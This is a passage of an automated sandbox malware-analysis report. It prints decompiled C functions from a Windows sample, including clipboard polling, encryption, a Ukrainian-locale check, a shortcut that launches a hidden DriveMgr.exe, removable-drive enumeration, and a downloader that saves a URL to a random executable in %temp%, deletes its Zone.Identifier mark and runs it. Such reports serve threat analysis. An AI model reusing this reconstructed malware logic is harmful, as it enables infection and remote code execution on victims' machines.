UnmapViewOfFile.KERNEL32(00000000), ref: 008B199E
CloseHandle.KERNEL32(00000000), ref: 008B19A8
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 008B19C2
SetEndOfFile.KERNEL32(000000FF), ref: 008B19CC
CloseHandle.KERNEL32(000000FF), ref: 008B19D6
CryptDestroyKey.ADVAPI32(00000000), ref: 008B19E0

Strings

NGS!, xrefs: 008B188A

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHandleHashImportProcessView$AllocDataEncryptFreeMappingPointerSignatureSizeUnmapVerify
String ID: NGS!
API String ID: 1316431928-4070929822
Opcode ID: 0da1deccafbe79f49fe9b8fb310d20a967eef0c7cd6d70d7a1a2443965670e3b
Instruction ID: 0d7cc1253aa5c20f345b8567f852531a456c8bf1aaf25562f4b76665167e604d
Opcode Fuzzy Hash: 0da1deccafbe79f49fe9b8fb310d20a967eef0c7cd6d70d7a1a2443965670e3b
Instruction Fuzzy Hash: 48614A75E00209AFDB14DBA4CC99FEEBBB5FB48700F548618F615BB280D775A901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 008B1F80, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E008B1F80(WCHAR* _a4, WCHAR* _a8) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				void* _v1120;
				short _v1644;
				short _v2164;
				void* _t29;
				void* _t60;
				void* _t61;

				CreateDirectoryW(_a8, 0);
				wsprintfW( &_v524, L"%s\\*", _a4);
				_t61 = _t60 + 0xc;
				_t29 = FindFirstFileW( &_v524,  &_v1116);
				_v1120 = _t29;
				if(_v1120 == 0xffffffff) {
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
						wsprintfW( &_v2164, L"%s\\%s", _a8,  &(_v1116.cFileName));
						_t61 = _t61 + 0x20;
						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
							MoveFileExW( &_v1644,  &_v2164, 9);
						} else {
							E008B1F80( &_v1644,  &_v2164);
							_t61 = _t61 + 8;
						}
					}
				} while (FindNextFileW(_v1120,  &_v1116) != 0);
				FindClose(_v1120);
				return RemoveDirectoryW(_a4);
			}

0x008b1f8f
0x008b1fa5
0x008b1fab
0x008b1fbc
0x008b1fc2
0x008b1fcf
0x008b20b2
0x00000000
0x00000000
0x00000000
0x008b1fd5
0x008b1fd5
0x008b1fe9
0x008b201a
0x008b203a
0x008b2040
0x008b204c
0x008b2076
0x008b204e
0x008b205c
0x008b2061
0x008b2061
0x008b204c
0x008b2090
0x008b209f
0x00000000

APIs

CreateDirectoryW.KERNEL32(008B25AB,00000000), ref: 008B1F8F
wsprintfW.USER32 ref: 008B1FA5
FindFirstFileW.KERNEL32(?,?), ref: 008B1FBC
lstrcmpW.KERNEL32(?,008B6C88), ref: 008B1FE1
lstrcmpW.KERNEL32(?,008B6C8C), ref: 008B1FF7
wsprintfW.USER32 ref: 008B201A
wsprintfW.USER32 ref: 008B203A
MoveFileExW.KERNEL32(?,?,00000009), ref: 008B2076
FindNextFileW.KERNEL32(000000FF,?), ref: 008B208A
FindClose.KERNEL32(000000FF), ref: 008B209F
RemoveDirectoryW.KERNEL32(?), ref: 008B20A9

Strings

%s\%s, xrefs: 008B202E
%s\%s, xrefs: 008B200E
%s\*, xrefs: 008B1F99

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*
API String ID: 92872011-445461498
Opcode ID: a6460f81705973b2e3ef3e7dc4379dc53fb69e312493954f0e6ea04cc236da77
Instruction ID: 7f53c9a8d4e61816ecf56656dc7d8b9d6e8c02f44ebef9727429c27694dc14cd
Opcode Fuzzy Hash: a6460f81705973b2e3ef3e7dc4379dc53fb69e312493954f0e6ea04cc236da77
Instruction Fuzzy Hash: DB3176B5500618EFCB60EB64DC88EEA7778FB48701F448688F609D3251EB39EA95CF54

Uniqueness

Uniqueness Score: -1.00%

Function 008B1660, Relevance: 9.0, APIs: 6, Instructions: 29
clipboardsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E008B1660() {
				char* _v8;
				void* _v12;
				void* _t17;

				L1:
				while(1) {
					if(OpenClipboard(0) == 0) {
						L6:
						Sleep(0xc8);
						continue;
					}
					_v12 = GetClipboardData(1);
					if(_v12 != 0) {
						_v8 = GlobalLock(_v12);
						if(_v8 != 0) {
							GlobalUnlock(_v12);
							E008B1000(_v8);
							_t17 = _t17 + 4;
						}
					}
					CloseClipboard();
					goto L6;
				}
			}

0x00000000
0x008b1666
0x008b1670
0x008b16b2
0x008b16b7
0x00000000
0x008b16b7
0x008b167a
0x008b1681
0x008b168d
0x008b1694
0x008b169a
0x008b16a4
0x008b16a9
0x008b16a9
0x008b1694
0x008b16ac
0x00000000
0x008b16ac

APIs

OpenClipboard.USER32(00000000), ref: 008B1668
GetClipboardData.USER32 ref: 008B1674
GlobalLock.KERNEL32 ref: 008B1687
GlobalUnlock.KERNEL32(00000000), ref: 008B169A
CloseClipboard.USER32 ref: 008B16AC
Sleep.KERNEL32(000000C8), ref: 008B16B7

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenSleepUnlock
String ID:
API String ID: 663716087-0
Opcode ID: 4cef84666a6f9d3e953b48c0194e7aef8986ab7b412e304b7a819e544da8c853
Instruction ID: d8d150996a1c0f60cf74cc98fcbc28d434442858e0d782d1ae21cf83a3cffa73
Opcode Fuzzy Hash: 4cef84666a6f9d3e953b48c0194e7aef8986ab7b412e304b7a819e544da8c853
Instruction Fuzzy Hash: 83F09A78900608EBDB00BBA4DC1DBCD7B74FB14302F044254E902AB2A0EA789A98CB15

Uniqueness

Uniqueness Score: -1.00%

Function 008B16F0, Relevance: 7.6, APIs: 5, Instructions: 79
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E008B16F0(void* _a4, int _a8, void* _a12, void* _a16, intOrPtr _a20) {
				long* _v8;
				char _v9;
				short _v11;
				char _v15;
				char _v19;
				char _v23;
				void _v24;
				char _v27;
				int _v28;
				char _v31;
				intOrPtr _v32;
				char _v35;
				char _v36;
				char _v37;
				int _v44;
				int _v48;
				signed int _t47;
				long* _t60;

				_v37 = 0;
				_v36 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v15 = 0;
				_v11 = 0;
				_v9 = 0;
				_v36 = 8;
				_v35 = 2;
				_v32 = 0x6801;
				if(_a20 >= 0x10) {
					_v48 = 0x10;
				} else {
					_v48 = _a20;
				}
				_v28 = _v48;
				memcpy( &_v24, _a16, _v28);
				memcpy(_a12, _a4, _a8);
				_v8 = 0;
				_t60 =  *0x8ba8a0; // 0xc9ea08
				if(CryptImportKey(_t60,  &_v36, 0x1c, 0, 0,  &_v8) != 0) {
					_v44 = _a8;
					_t47 = _a12;
					__imp__CryptEncrypt(_v8, 0, 1, 0, _t47,  &_v44, _v44);
					asm("sbb eax, eax");
					_v37 =  ~( ~_t47);
					CryptDestroyKey(_v8);
				}
				return _v37;
			}

0x008b16f6
0x008b16fa
0x008b1700
0x008b1703
0x008b1706
0x008b1709
0x008b170c
0x008b170f
0x008b1712
0x008b1716
0x008b1719
0x008b171d
0x008b1721
0x008b172c
0x008b1736
0x008b172e
0x008b1731
0x008b1731
0x008b1740
0x008b174f
0x008b1763
0x008b176b
0x008b1780
0x008b178f
0x008b1794
0x008b179f
0x008b17ad
0x008b17b5
0x008b17b9
0x008b17c0
0x008b17c0
0x008b17cc

APIs

memcpy.MSVCRT ref: 008B174F
memcpy.MSVCRT ref: 008B1763
CryptImportKey.ADVAPI32(00C9EA08,00000008,0000001C,00000000,00000000,00000000), ref: 008B1787
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 008B17AD
CryptDestroyKey.ADVAPI32(00000000), ref: 008B17C0

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: Crypt$memcpy$DestroyEncryptImport
String ID:
API String ID: 774555595-0
Opcode ID: ba40d78c8493f273eb793f5752634b4a238b25cd8f3160213a09a3106015298a
Instruction ID: e8509cbe69b34826c48290d4adba837f485253dd34c06e8869d3642bf881b025
Opcode Fuzzy Hash: ba40d78c8493f273eb793f5752634b4a238b25cd8f3160213a09a3106015298a
Instruction Fuzzy Hash: 693106B5D04249EFDF00CFE8C885BEEBBB5BB48700F148159E905F7280E6749A15CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 008B28E0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E008B28E0() {
				char _v16;

				memset( &_v16, 0, 0xa);
				GetLocaleInfoA(0x400, 7,  &_v16, 0xa);
				if(strcmp( &_v16, "UKR") != 0) {
					return 0;
				}
				return 1;
			}

0x008b28ee
0x008b2903
0x008b291c
0x00000000
0x008b2922
0x00000000

APIs

memset.MSVCRT ref: 008B28EE
GetLocaleInfoA.KERNEL32(00000400,00000007,00000000,0000000A,?,?,?,00000000,?,0000000A), ref: 008B2903
strcmp.MSVCRT ref: 008B2912

Strings

UKR, xrefs: 008B2909

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: InfoLocalememsetstrcmp
String ID: UKR
API String ID: 3255129521-64918367
Opcode ID: a3ca1b5e1992d1134864b7d2ab99bb891692de9d58acdd22f8ccc393508157f1
Instruction ID: 1f28ab05d23a7a032f192708f5fd8a8945e5bceb69f31653754d0fa43f9f0c29
Opcode Fuzzy Hash: a3ca1b5e1992d1134864b7d2ab99bb891692de9d58acdd22f8ccc393508157f1
Instruction Fuzzy Hash: 03E0D87AE44308B6DA20B6A09C03FED7728F721701F000154FB18EA2C1F5B4661887A3

Uniqueness

Uniqueness Score: -1.00%

Function 008B1EC0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78
comCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E008B1EC0(intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				char* _t29;

				_t29 =  &_v8;
				__imp__CoCreateInstance(0x8b75dc, 0, 0x17, 0x8b75bc, _t29);
				if(_t29 >= 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x50))))(_v8, L"%windir%\\system32\\cmd.exe");
					 *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x44))))(_v8, _a12, _a16);
					 *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x3c))))(_v8, 7);
					 *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x2c))))(_v8, L"/c start __ & __\\DriveMgr.exe & exit");
					_push( &_v12);
					_push(0x8b75cc);
					_push(_v8);
					if( *((intOrPtr*)( *((intOrPtr*)( *_v8))))() >= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x18))))(_v12, _a4, 1);
						 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
					}
					return  *((intOrPtr*)( *((intOrPtr*)( *_v8 + 8))))(_v8);
				}
				return _t29;
			}

0x008b1ec6
0x008b1ed8
0x008b1ee0
0x008b1ef7
0x008b1f0d
0x008b1f1d
0x008b1f30
0x008b1f35
0x008b1f36
0x008b1f43
0x008b1f4a
0x008b1f5e
0x008b1f6c
0x008b1f6c
0x00000000
0x008b1f7a
0x008b1f7f

APIs

CoCreateInstance.OLE32(008B75DC,00000000,00000017,008B75BC,00000008,shell32.dll,00000008), ref: 008B1ED8

Strings

/c start __ & __\DriveMgr.exe & exit, xrefs: 008B1F1F
%windir%\system32\cmd.exe, xrefs: 008B1EE6

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: CreateInstance
String ID: %windir%\system32\cmd.exe$/c start __ & __\DriveMgr.exe & exit
API String ID: 542301482-2643104863
Opcode ID: 40ac3851816fccdd06e9a6c817d1c8e73d4f5260098fd6f74516bb5a8673b488
Instruction ID: 9e7bdd67670a9c2eaeb02cc5913be1dc810a8da18b8be3119d5a48c35bcd5f60
Opcode Fuzzy Hash: 40ac3851816fccdd06e9a6c817d1c8e73d4f5260098fd6f74516bb5a8673b488
Instruction Fuzzy Hash: 3121B479744509EFC704DF98C991D9EB3BAFF8C700B204198E605DB3A1DA71AE41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 008B19F0, Relevance: 66.7, APIs: 32, Strings: 6, Instructions: 215
filesleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E008B19F0(char* _a4) {
				short _v524;
				short _v1044;
				signed int _v1045;
				short _v1572;
				void* _v1576;
				void* _v1580;
				short _v2100;
				void _v2620;
				long _v2624;
				long _v2628;
				void* _v2632;
				signed int _t70;
				signed int _t72;
				int _t78;
				signed int _t79;
				signed int _t81;
				signed char _t106;
				signed char _t109;
				void* _t150;
				void* _t153;
				void* _t158;

				_v1045 = 0;
				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x208);
				mbstowcs( &_v1044, _a4, strlen(_a4) + 1);
				_t70 = rand();
				asm("cdq");
				_t72 = rand();
				asm("cdq");
				wsprintfW( &_v1572, L"%ls\\%d%d.exe",  &_v2100, _t72 % 0x7530 + 0x2710, _t70 % 0x7530 + 0x2710);
				_t153 = _t150 + 0x24;
				_v2632 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
				if(_v2632 == 0) {
					L14:
					InternetCloseHandle(_v2632);
					Sleep(0x3e8);
					_t78 = _v1045 & 0x000000ff;
					if(_t78 != 0) {
						L19:
						return _t78;
					}
					_t79 = rand();
					asm("cdq");
					_t81 = rand();
					asm("cdq");
					_t78 = wsprintfW( &_v1572, L"%ls\\%d%d.exe",  &_v2100, _t81 % 0x7530 + 0x2710, _t79 % 0x7530 + 0x2710);
					_push(0);
					_push(0);
					_push( &_v1572);
					_push( &_v1044);
					_push(0);
					L008B57AC();
					if(_t78 != 0) {
						goto L19;
					}
					wsprintfW( &_v524, L"%ls:Zone.Identifier",  &_v1572);
					DeleteFileW( &_v524);
					Sleep(0x3e8);
					if((E008B17D0( &_v1572) & 0x000000ff) == 0) {
						return DeleteFileW( &_v1572);
					}
					Sleep(0x3e8);
					return E008B2730( &_v1572);
				}
				_v1576 = InternetOpenUrlW(_v2632,  &_v1044, 0, 0, 0, 0);
				if(_v1576 == 0) {
					L13:
					InternetCloseHandle(_v1576);
					goto L14;
				}
				_v1580 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0);
				if(_v1580 == 0xffffffff) {
					L12:
					CloseHandle(_v1580);
					goto L13;
				}
				memset( &_v2620, 0, 0x208);
				_t158 = _t153 + 0xc;
				while(InternetReadFile(_v1576,  &_v2620, 0x207,  &_v2628) != 0 && _v2628 != 0) {
					WriteFile(_v1580,  &_v2620, _v2628,  &_v2624, 0);
				}
				CloseHandle(_v1580);
				Sleep(0x3e8);
				wsprintfW( &_v524, L"%ls:Zone.Identifier",  &_v1572);
				DeleteFileW( &_v524);
				Sleep(0x3e8);
				_t106 = E008B17D0( &_v1572);
				_t153 = _t158 + 0x10;
				if((_t106 & 0x000000ff) == 0) {
					DeleteFileW( &_v1572);
				} else {
					Sleep(0x3e8);
					_t109 = E008B2730( &_v1572);
					_t153 = _t153 + 4;
					if((_t109 & 0x000000ff) == 1) {
						_v1045 = 1;
					}
				}
				goto L12;
			}

0x008b19f9
0x008b1a11
0x008b1a32
0x008b1a3a
0x008b1a3f
0x008b1a4e
0x008b1a53
0x008b1a75
0x008b1a7b
0x008b1a91
0x008b1a9e
0x008b1c1f
0x008b1c26
0x008b1c31
0x008b1c37
0x008b1c40
0x008b1d1d
0x008b1d1d
0x008b1d1d
0x008b1c46
0x008b1c4b
0x008b1c5a
0x008b1c5f
0x008b1c81
0x008b1c8a
0x008b1c8c
0x008b1c94
0x008b1c9b
0x008b1c9c
0x008b1c9e
0x008b1ca5
0x00000000
0x00000000
0x008b1cba
0x008b1cca
0x008b1cd5
0x008b1cef
0x00000000
0x008b1d14
0x008b1cf6
0x00000000
0x008b1d08
0x008b1ac0
0x008b1acd
0x008b1c12
0x008b1c19
0x00000000
0x008b1c19
0x008b1aef
0x008b1afc
0x008b1c05
0x008b1c0c
0x00000000
0x008b1c0c
0x008b1b10
0x008b1b15
0x008b1b18
0x008b1b63
0x008b1b63
0x008b1b72
0x008b1b7d
0x008b1b96
0x008b1ba6
0x008b1bb1
0x008b1bbe
0x008b1bc3
0x008b1bcb
0x008b1bff
0x008b1bcd
0x008b1bd2
0x008b1bdf
0x008b1be4
0x008b1bed
0x008b1bef
0x008b1bef
0x008b1bf6
0x00000000

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 008B1A11
strlen.MSVCRT ref: 008B1A1B
mbstowcs.MSVCRT ref: 008B1A32
rand.MSVCRT ref: 008B1A3A
rand.MSVCRT ref: 008B1A4E
wsprintfW.USER32 ref: 008B1A75
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 008B1A8B
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 008B1ABA
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 008B1AE9
memset.MSVCRT ref: 008B1B10
InternetReadFile.WININET(00000000,?,00000207,?), ref: 008B1B32
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 008B1B63
CloseHandle.KERNEL32(000000FF), ref: 008B1B72
Sleep.KERNEL32(000003E8), ref: 008B1B7D
wsprintfW.USER32 ref: 008B1B96
DeleteFileW.KERNEL32(?), ref: 008B1BA6
Sleep.KERNEL32(000003E8), ref: 008B1BB1
Sleep.KERNEL32(000003E8), ref: 008B1BD2
DeleteFileW.KERNEL32(?), ref: 008B1BFF
CloseHandle.KERNEL32(000000FF), ref: 008B1C0C
InternetCloseHandle.WININET(00000000), ref: 008B1C19
InternetCloseHandle.WININET(00000000), ref: 008B1C26
Sleep.KERNEL32(000003E8), ref: 008B1C31
rand.MSVCRT ref: 008B1C46
rand.MSVCRT ref: 008B1C5A
wsprintfW.USER32 ref: 008B1C81
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 008B1C9E
wsprintfW.USER32 ref: 008B1CBA
DeleteFileW.KERNEL32(?), ref: 008B1CCA
Sleep.KERNEL32(000003E8), ref: 008B1CD5
Sleep.KERNEL32(000003E8), ref: 008B1CF6
DeleteFileW.KERNEL32(?), ref: 008B1D14

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36, xrefs: 008B1A86
%ls\%d%d.exe, xrefs: 008B1A69
%ls:Zone.Identifier, xrefs: 008B1CAE
%ls:Zone.Identifier, xrefs: 008B1B8A
%ls\%d%d.exe, xrefs: 008B1C75
%temp%, xrefs: 008B1A0C

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: File$Sleep$Internet$CloseDeleteHandlerandwsprintf$Open$CreateDownloadEnvironmentExpandReadStringsWritembstowcsmemsetstrlen
String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%ls\%d%d.exe$%ls\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
API String ID: 3794597279-225735804
Opcode ID: bc160ff85197588906e6c7ba4729da915524b0eac278a8d3d78b4d76b2080a76
Instruction ID: 079e978a2a24de1728c378c75f5afe54cc1ed05ff0398047e296a2e72aeb2f41
Opcode Fuzzy Hash: bc160ff85197588906e6c7ba4729da915524b0eac278a8d3d78b4d76b2080a76
Instruction Fuzzy Hash: CD810EB1A40714ABDB20EB64DC49FE97339FB88701F044598F609E51C1EA799BA4CF51

Uniqueness

Uniqueness Score: -1.00%

Function 008B1E00, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E008B1E00() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				long _v20;
				signed int _v24;
				void* _v28;
				char _v32;
				int _v36;
				void* _t44;

				_v20 = GetLogicalDrives();
				_v16 = 0;
				_v12 = 0x80000002;
				_v8 = 0x80000001;
				_v24 = 0;
				while(_v24 < 2) {
					if(RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28) == 0) {
						_v32 = 0;
						_v36 = 4;
						if(RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36) == 0 && _v32 != 0) {
							_v16 = _v16 | _v32;
						}
						RegCloseKey(_v28);
					}
					_v24 = _v24 + 1;
				}
				return  !_v16 & _v20;
			}

0x008b1e0c
0x008b1e0f
0x008b1e16
0x008b1e1d
0x008b1e24
0x008b1e36
0x008b1e5c
0x008b1e5e
0x008b1e65
0x008b1e89
0x008b1e97
0x008b1e97
0x008b1e9e
0x008b1e9e
0x008b1e33
0x008b1e33
0x008b1eb1

APIs

GetLogicalDrives.KERNEL32 ref: 008B1E06
RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 008B1E54
RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 008B1E81
RegCloseKey.ADVAPI32(?), ref: 008B1E9E

Strings

NoDrives, xrefs: 008B1E78
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 008B1E47

Memory Dump Source

Source File: 00000000.00000002.237279841.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true

Associated: 00000000.00000002.237276490.00000000008B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237285151.00000000008B6000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237288980.00000000008B9000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.237293018.00000000008BA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.237296013.00000000008BB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_Br6Pmt0MiZ.jbxd

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: 93e1e078fb82f86c6c68872c2fe8d752ad446a33517bb68ebb2e64514c9af01f
Instruction ID: 143dc960e2ff52084213c4566f34daa01017b48cb93d7b4325bde23c3bebfe9a
Opcode Fuzzy Hash: 93e1e078fb82f86c6c68872c2fe8d752ad446a33517bb68ebb2e64514c9af01f
Instruction Fuzzy Hash: 5111E7B1E4020ADBDF10DFD1C959BEEBBB4FB48304F108108E911BA280D778AA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 008B2A10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E008B2A10(char* _a4, intOrPtr* _a8) {
				void* _v8;
				char _v9;
				void* _v16;
				void _v20;
				long _v24;

				_v9 = 0;
				_v16 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 1, 0, 0, 0);
				if(_v16 != 0) {
					_v8 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0);
					if(_v8 != 0) {
						_v24 = 4;
						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
						if(_v20 > 0x1b58 && _v20 !=  *_a8) {
							 *_a8 = _v20;
							_v9 = 1;
						}
						InternetCloseHandle(_v8);
					}
					InternetCloseHandle(_v16);
				}
				return _v9;
			}

0x008b2a16
0x008b2a2d
0x008b2a34
0x008b2a4c
0x008b2a53
0x008b2a55
0x008b2a6f
0x008b2a7c
0x008b2a8e
0x008b2a90
0x008b2a90
0x008b2a98
0x008b2a98
0x008b2aa2
0x008b2aa2
0x008b2aae

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000001,00000000,00000000,00000000), ref: 008B2A27
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 008B2A46
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 008B2A6F
InternetCloseHandle.WININET(00000000), ref: 008B2A98
InternetCloseHandle.WININET(00000000), ref: 008B2AA2

Strings

